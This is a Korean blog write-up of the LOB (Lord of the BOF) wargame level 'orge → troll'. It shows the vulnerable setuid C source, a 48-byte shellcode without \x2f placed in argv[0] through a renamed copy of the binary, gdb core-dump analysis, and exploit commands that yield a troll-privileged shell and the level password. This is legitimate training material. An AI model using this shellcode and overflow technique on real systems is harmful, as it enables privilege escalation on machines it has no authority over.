시스템 해킹/LOB

[LOB] orge → troll

ruming 2021. 2. 24. 21:03

orge / timewalker 로 접속

 

troll.c

[orge@localhost orge]$ ls -l
total 20
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c
[orge@localhost orge]$ cat troll.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
        char buffer[40];
        int i;

        // here is changed
        if(argc != 2){
                printf("argc must be two!\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

        // one more!
        memset(argv[1], 0, strlen(argv[1]));
}

argv[0]과 argv[1]만 쓰도록 조건이 추가되었고, argv[1]도 초기화되는 제약이 생겼다. 쉘코드를 넣을 수 있는 곳이 argv[0]뿐이다.

 

argv[0]에 쉘코드를 넣기 위해 쉘코드를 파일명으로 갖는 심볼릭 링크 파일을 사용하는 방법이 있는데, 파일명에 \x2f가 포함되면 /로 인식하기 때문에 조심해야 한다. \x2f가 없는 쉘코드를 쓰도록 하겠다.

 

\x2f없는 48바이트 쉘코드

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

 

troll을 nop를 포함한 쉘코드 이름의 파일로 복사하고 core dumped를 일으켰다.

[orge@localhost orge]$ cp troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81 "+"\xbf"*48'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜
Segmentation fault (core dumped)

 

core 분석

[orge@localhost orge]$ gdb -c core -q
Core was generated by `./릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?릱릱릱릱릱릱릱릱릱릱릱'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/1000x $esp
0xbffff960:     0x00000000      0xbffff9a4      0xbffff9b0      0x40013868
0xbffff970:     0x00000002      0x08048450      0x00000000      0x08048471
0xbffff980:     0x08048500      0x00000002      0xbffff9a4      0x08048390
0xbffff990:     0x0804866c      0x4000ae60      0xbffff99c      0x40013e90
0xbffff9a0:     0x00000002      0xbffffaa2      0xbffffb39      0x00000000
0xbffff9b0:     0xbffffb6a      0xbffffb79      0xbffffb92      0xbffffbb1
0xbffff9c0:     0xbffffbd3      0xbffffbdd      0xbffffda0      0xbffffdbf
0xbffff9d0:     0xbffffdd9      0xbffffdee      0xbffffe0a      0xbffffe15
0xbffff9e0:     0xbffffe22      0xbffffe2a      0xbffffe34      0xbffffe44
0xbffff9f0:     0xbffffe52      0xbffffe60      0xbffffe71      0xbffffe7c
0xbffffa00:     0xbffffe8c      0xbffffecc      0x00000000      0x00000003
0xbffffa10:     0x08048034      0x00000004      0x00000020      0x00000005
0xbffffa20:     0x00000006      0x00000006      0x00001000      0x00000007
0xbffffa30:     0x40000000      0x00000008      0x00000000      0x00000009
0xbffffa40:     0x08048450      0x0000000b      0x000001fb      0x0000000c
0xbffffa50:     0x000001fb      0x0000000d      0x000001fb      0x0000000e
0xbffffa60:     0x000001fb      0x00000010      0x0f8bfbff      0x0000000f
0xbffffa70:     0xbffffa9d      0x00000000      0x00000000      0x00000000
0xbffffa80:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffa90:     0x00000000      0x00000000      0x00000000      0x38366900
0xbffffaa0:     0x2f2e0036      0x90909090      0x90909090      0x90909090
0xbffffab0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffad0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffae0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffaf0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffb00:     0x90909090      0x90909090      0x315e11eb      0x8032b1c9
0xbffffb10:     0x01ff0e6c      0x7501e980      0xe805ebf6      0xffffffea
0xbffffb20:     0x6951c132      0x69743030      0x6a633069      0x51e48a6f
0xbffffb30:     0x9ae28a54      0x81ce0cb1      0x00000000      0x00000000
0xbffffb40:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffb60:     0x00000000      0x00000000      0x00000000      0x00000000
...

쉘코드가 있는 부분을 찾았다. argv[0] 부분의 주소로 공격을 시도해보겠다.

0xbffffae0쯤으로 잡겠다.

 

다음 코드로 공격했다.

[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xe0\xfa\xff\xbf"'` 
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xe0\xfa\xff\xbf"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜猩?
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin

공격에 성공했다!

aspirin

 

더보기 
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xf0\xfa\xff\xbf"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜種?
bash$ exit
exit
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xd0\xfa\xff\xbf"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜幾?
bash$ exit
exit
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xa0\xfa\xff\xbf"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜좞?
Segmentation fault
[orge@localhost orge]$ ./`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "\xbf"*44+"\xb0\xfa\xff\xbf"'`
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜과?
bash$ exit
exit

0xbffffab0부터 0xbffffaf0까지는 공격에 성공한다. 

 

'시스템 해킹 > LOB' 카테고리의 다른 글

[LOB] troll → vampire  (0) 2021.02.27
[LOB] darkelf → orge  (0) 2021.02.22
[LOB] wolfman → darkelf  (0) 2021.02.22
[LOB] orc → wolfman  (0) 2021.02.21
[LOB] goblin → orc  (0) 2021.02.21

'시스템 해킹/LOB'의 다른글

  • 현재글[LOB] orge → troll

관련글

댓글

티스토리툴바